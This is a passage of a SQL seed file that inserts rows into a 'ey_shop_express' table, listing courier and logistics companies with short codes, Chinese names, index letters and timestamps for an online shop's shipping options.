INSERT INTO `ey_shop_express` VALUES ('80', 'chengtong', '城通物流', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('81', 'otpexpress', '承诺达', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('82', 'sfpost', '曹操到', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('83', 'changwooair', '昌宇国际', 'C', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('84', 'dhl', 'DHL快递(中国件)', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('85', 'dhlen', 'DHL(国际件)', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('86', 'dhlde', 'DHL(德国件)', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('87', 'dtwl', '大田物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('88', 'disifang', '递四方', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('89', 'dayangwuliu', '大洋物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('90', 'dechuangwuliu', '德创物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('91', 'dskd', 'D速物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('92', 'donghanwl', '东瀚物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('93', 'dfpost', '达方物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('94', 'dongjun', '东骏快捷物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('95', 'dindon', '叮咚澳洲转运', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('96', 'dazhong', '大众佐川急便', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('97', 'ahdf', '德方物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('98', 'dehaoyi', '德豪驿', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('99', 'dhlpaket', 'DHL Paket', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('100', 'ubuy', '德国优拜物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('101', 'adlerlogi', '德国雄鹰速递', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('102', 'yunexpress', '德国云快递', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('103', 'di5pll', '递五方云仓', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('104', 'deguo8elog', '德国八易转运', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('105', 'camekong', '到了港', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('106', 'dbstation', 'db-station', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('107', 'dadaoex', '大道物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('108', 'dekuncn', '德坤物流', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('109', 'twkd56', '缔惠盛合', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('110', 'gslexpress', '德尚国际速递', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('111', 'eucpost', '德国 EUC POST', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('112', 'est365', '东方汇', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('113', 'ecotransite', '东西E全运', 'D', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('114', 'euexpress', 'EU-EXPRESS', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('115', 'emsguoji', 'EMS国际快递查询', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('116', 'eshunda', '俄顺达', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('117', 'ewe', 'EWE全球快递', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('118', 'easyexpress', 'EASYEXPRESS国际速递', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('119', 'edtexpress', 'e直运', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('120', 'ecallturn', 'E跨通', 'E', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('121', 'fedex', 'FedEx快递查询', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('122', 'fedexus', 'FedEx(美国)', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('123', 'fox', 'FOX国际速递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('124', 'rufengda', '如风达快递', 'R', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('125', 'fkd', '飞康达物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('126', 'feibaokuaidi', '飞豹快递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('127', 'fandaguoji', '颿达国际', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('128', 'feiyuanvipshop', '飞远配送', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('129', 'hnfy', '飞鹰物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('130', 'fengxingtianxia', '风行天下', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('131', 'flysman', '飞力士物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('132', 'fbkd', '飞邦快递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('133', 'sccod', '丰程物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('134', 'crazyexpress', '疯狂快递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('135', 'ftlexpress', '法翔速运', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('136', 'ftd', '富腾达快递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('137', 'arkexpress', '方舟国际速递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('138', 'fedroad', 'FedRoad 联邦转运', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('139', 'freakyquick', 'FQ狂派速递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('140', 'fecobv', '丰客物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('141', 'fyex', '飞云快递系统', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('142', 'beebird', '锋鸟物流', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('143', 'shipgce', '飞洋快递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('144', 'koali', '番薯国际货运', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('145', 'epanex', '泛捷国际速递', 'F', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('146', 'gaticn', 'GATI快递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('147', 'gts', 'GTS快递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('148', 'guotongkuaidi', '国通快递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('149', 'ndkd', '能达速递', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('150', 'gongsuda', '共速达', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('151', 'gtongsudi', '广通速递(山东)', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('152', 'suteng', '速腾物流', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('153', 'gdkd', '港快速递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('154', 'hre', '高铁速递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('155', 'gscq365', '哥士传奇速递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('156', 'gjwl', '冠捷物流', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('157', 'xdshipping', '国晶物流', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('158', 'ge2d', 'GE2D跨境物流', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('159', 'gaotieex', '高铁快运', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('160', 'gansuandi', '甘肃安的快递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('161', 'gdct56', '广东诚通物流', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('162', 'ghtexpress', 'GHT物流', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('163', 'goldjet', '高捷快运', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('164', 'gtgogo', 'GT国际快运', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('165', 'gxwl', '光线速递', 'G', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('166', 'tdhy', '华宇物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('167', 'hl', '恒路物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('168', 'hlyex', '好来运快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('169', 'hebeijianhua', '河北建华', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('170', 'huaqikuaiyun', '华企快运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('171', 'haosheng', '昊盛物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('172', 'hutongwuliu', '户通物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('173', 'hzpl', '华航快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('174', 'huangmajia', '黄马甲快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('175', 'ucs', '合众速递(UCS)', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('176', 'pfcexpress', '皇家物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('177', 'huoban', '伙伴物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('178', 'nedahm', '红马速递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('179', 'huiwen', '汇文配送', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('180', 'nmhuahe', '华赫物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('181', 'hjs', '猴急送', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('182', 'hangyu', '航宇快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('183', 'huilian', '辉联物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('184', 'huanqiu', '环球速运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('185', 'htwd', '华通务达物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('186', 'hipito', '海派通', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('187', 'hqtd', '环球通达', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('188', 'airgtc', '航空快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('189', 'haoyoukuai', '好又快物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('190', 'ccd', '河南次晨达', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('191', 'hfwuxi', '和丰同城', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('192', 'higo', '黑狗物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('193', 'hyytes', '恒宇运通', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('194', 'hengrui56', '恒瑞物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('195', 'hangrui', '上海航瑞货运', 'S', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('196', 'ghl', '环创物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('197', 'hnqst', '河南全速通', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('198', 'hitaoe', 'Hi淘易快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('199', 'hhair56', '华瀚快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('200', 'haimibuy', '海米派物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('201', 'ht22', '海淘物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('202', 'hivewms', '海沧无忧', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('203', 'hnht56', '鸿泰物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('204', 'hsgtsd', '海硕高铁速递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('205', 'hltop', '海联快递', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('206', 'hlkytj', '互联快运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('207', 'haidaibao', '海带宝转运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('208', 'flowerkd', '花瓣转运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('209', 'heimao56', '黑猫速运', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('210', 'logistics', '華信物流WTO', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('211', 'hgy56', '环国运物流', 'H', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('212', 'iparcel', 'i-parcel', 'I', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('213', 'jjwl', '佳吉物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('214', 'jywl', '佳怡物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('215', 'jymwl', '加运美快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('216', 'jxd', '急先达物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('217', 'jgsd', '京广速递快件', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('218', 'jykd', '晋越快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('219', 'jd', '京东物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('220', 'jietekuaidi', '捷特快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('221', 'jiuyicn', '久易快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('222', 'jiuyescm', '九曳供应链', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('223', 'junfengguoji', '骏丰国际速递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('224', 'jiajiatong56', '佳家通', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('225', 'jrypex', '吉日优派', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('226', 'jinchengwuliu', '锦程国际物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('227', 'jgwl', '景光物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('228', 'pzhjst', '急顺通', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('229', 'ruexp', '捷网俄全通', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('230', 'jialidatong', '嘉里大通', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('231', 'jmjss', '金马甲', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('232', 'jiacheng', '佳成快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('233', 'jsexpress', '骏绅物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('234', 'hrex', '锦程快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('235', 'jieanda', '捷安达国际速递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('236', 'newsway', '家家通快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('237', 'mapleexpress', '今枫国际快运', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('238', 'jixiangyouau', '吉祥邮(澳洲)', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('239', 'jjx888', '佳捷翔物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('240', 'polarexpress', '极地快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('241', 'jiazhoumao', '加州猫速递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('242', 'juzhongda', '聚中大', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('243', 'jieborne', '捷邦物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('244', 'jxfex', '集先锋速递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('245', 'jiugong', '九宫物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('246', 'jiujiuwl', '久久物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('247', 'jintongkd', '劲通快递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('248', 'jcsuda', '嘉诚速达', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('249', 'jingshun', '景顺物流', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('250', 'fastontime', '加拿大联通快运', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('251', 'khzto', '柬埔寨中通', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('252', 'kjkd', '快捷快递', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('253', 'kangliwuliu', '康力物流', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('254', 'kuayue', '跨越速运', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('255', 'kuaiyouda', '快优达速递', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('256', 'happylink', '开心快递', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('257', 'ksudi', '快速递', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('258', 'kyue', '跨跃国际', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('259', 'kfwnet', '快服务', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('260', 'kuai8', '快8速运', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('261', 'kuaidawuliu', '快达物流', 'K', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('262', 'lianb', '联邦快递(国内)', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('263', 'lhtwl', '联昊通物流', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('264', 'lb', '龙邦速递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('265', 'lejiedi', '乐捷递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('266', 'lanhukuaidi', '蓝弧快递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('267', 'ltexp', '乐天速递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('268', 'lutong', '鲁通快运', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('269', 'ledii', '乐递供应链', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('270', 'lundao', '论道国际物流', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('271', 'lasy56', '林安物流', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('272', 'lsexpress', '6LS EXPRESS', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('273', 'szuem', '联运通物流', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('274', 'blueskyexpress', '蓝天国际航空快递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('275', 'lfexpress', '龙枫国际速递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('276', 'gslhkd', '联合快递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('277', 'longfx', '龙飞祥快递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('278', 'luben', '陆本速递 LUBEN EXPRESS', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('279', 'unitedex', '联合速运', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('280', 'lbex', '龙邦物流', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('281', 'ltparcel', '联通快递', 'L', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('282', 'macroexpressco', 'ME物流', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('283', 'mh', '民航快递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('284', 'meiguokuaidi', '美国快递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('285', 'menduimen', '门对门', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('286', 'mingliangwuliu', '明亮物流', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('287', 'minbangsudi', '民邦速递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('288', 'minshengkuaidi', '闽盛快递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('289', 'yundaexus', '美国韵达', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('290', 'mchy', '木春货运', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('291', 'meiquick', '美快国际物流', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('292', 'valueway', '美通快递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('293', 'cnmcpl', '马珂博逻', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('294', 'mailongdy', '迈隆递运', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('295', 'zsmhwl', '明辉物流', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('296', 'mosuda', '魔速达', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('297', 'meibang', '美邦国际快递', 'M', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('298', 'nuoyaao', '偌亚奥国际', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('299', 'nuoer', '诺尔国际物流', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('300', 'nell', '尼尔快递', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('301', 'ndwl', '南方传媒物流', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('302', 'canhold', '能装能送', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('303', 'wanjiatong', '宁夏万家通', 'N', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('304', 'nlebv', '欧亚专线', 'O', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('305', 'oborexpress', 'OBOR Express', 'O', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('306', 'pcaexpress', 'PCA Express', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('307', 'pingandatengfei', '平安达腾飞', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('308', 'peixingwuliu', '陪行物流', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('309', 'pengyuanexpress', '鹏远国际速递', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('310', 'postelbe', 'PostElbe', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('311', 'papascm', '啪啪供应链', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('312', 'bazirim', '皮牙子快递', 'P', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('313', 'qfkd', '全峰快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('314', 'qy', '全一快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('315', 'qrt', '全日通快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('316', 'qckd', '全晨快递', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('317', 'sevendays', '7天连锁物流', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('318', 'qbexpress', '秦邦快运', 'Q', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('319', 'quanxintong', '全信通快递', 'Q', '1', '100', '1553911076', '1553911076');
